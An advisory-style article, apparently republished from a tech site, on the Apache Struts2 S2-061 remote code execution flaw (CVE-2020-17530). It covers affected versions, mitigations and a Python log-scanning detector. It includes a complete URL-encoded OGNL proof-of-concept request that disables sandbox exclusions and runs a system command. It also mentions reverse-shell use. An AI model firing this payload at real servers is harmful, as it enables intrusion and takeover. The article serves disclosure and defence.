Example Analysis of the Apache Struts2 S2-061 Remote Code Execution Vulnerability (CVE-2020-17530)

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article walks through an example analysis of the Apache Struts2 S2-061 remote code execution vulnerability (CVE-2020-17530), which many people may not understand well. The content is summarized below to make it easier to follow.

Vulnerability description

Apache Struts2 is a web framework for developing Java EE web applications. Apache Struts disclosed the S2-061 remote code execution vulnerability (CVE-2020-17530) on December 8, 2020. OGNL expression injection may be possible in situations such as the use of certain tags, resulting in remote code execution, so the risk is high. This vulnerability is a bypass of the fix for S2-059. The fix for S2-059 only fixed the sandbox bypass, not the execution of the OGNL expression. The execution of OGNL expressions has also been fixed in the latest version, 2.5.26.

This vulnerability is only a bypass of the S2-059 fix, and the core class exploited this time, org.apache.commons.collections.BeanMap, is in the commons-collections-x.x.jar package, which is not included in the official minimum dependency package. So even if a scan finds an injection point that supports OGNL expressions, it cannot be exploited without this dependency package.

PoC

GET /?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27org.apache.tomcat.InstanceManager%27]).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr[%27struts.valueStack%27]).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3D{%27id%27}).(%23res%3d%23exec.exec(%23cmd))} HTTP/1.1
Host: ip:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Encoding: gzip, deflate
Connection: close

Demonstrated results (images not preserved): read id; write a file; test dnslog; reverse shell.

Affected versions

Apache Struts 2.0.0-2.5.25

Security recommendations

(1) Upgrade the Apache Struts framework to the latest version.

(2) Alternatively, turn on OGNL expression injection protection and filter %{} expressions.

(3) When deploying the environment, use a minimized deployment with the minimum dependency package to avoid vulnerabilities.
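
As an added illustration of recommendation (2), not code from the original article or from the Struts project, the following sketch scans access-log lines for %{} expressions, decoding repeatedly because the PoC above sends the opener as %25{. The log format, function names and sample lines are assumptions; the token list is taken from the PoC on this page.

```python
import re
from urllib.parse import unquote_plus

# Class and property names taken from the PoC on this page (S2-061 chain).
POC_TOKENS = (
    "org.apache.tomcat.InstanceManager",
    "org.apache.commons.collections.BeanMap",
    "struts.valueStack",
    "memberAccess",
    "excludedClasses",
    "excludedPackageNames",
    "freemarker.template.utility.Execute",
)
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so %25{ and %2525{ both surface as %{."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return (verdict, matched PoC tokens) for a request target."""
    decoded = decode_fully(target)
    if "%{" not in decoded:
        return "clean", []
    hits = [t for t in POC_TOKENS if t.lower() in decoded.lower()]
    return ("ognl-poc-tokens" if hits else "ognl-expression"), hits

def scan(lines):
    """Return (line_number, verdict, hits) for every non-clean request line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            verdict, hits = classify(match.group(1))
            if verdict != "clean":
                findings.append((number, verdict, hits))
    return findings

# Constructed access-log lines (assumed combined-log style), not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Dec/2020:10:00:01 +0000] "GET /index.action?id=42 HTTP/1.1" 200 512',
    '10.0.0.9 - - [08/Dec/2020:10:00:07 +0000] "GET /?id=%25%7B%23attr%5B%27struts.valueStack%27%5D%7D HTTP/1.1" 200 498',
    '10.0.0.9 - - [08/Dec/2020:10:00:09 +0000] "GET /?id=%2525%7B1%2B1%7D HTTP/1.1" 200 498',
    '10.0.0.7 - - [08/Dec/2020:10:00:12 +0000] "GET /search?q=100%25+cotton HTTP/1.1" 200 730',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

POST parameters do not appear in access logs, so the same classify() check would also need to run where request bodies are visible, such as a servlet filter or WAF rule.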
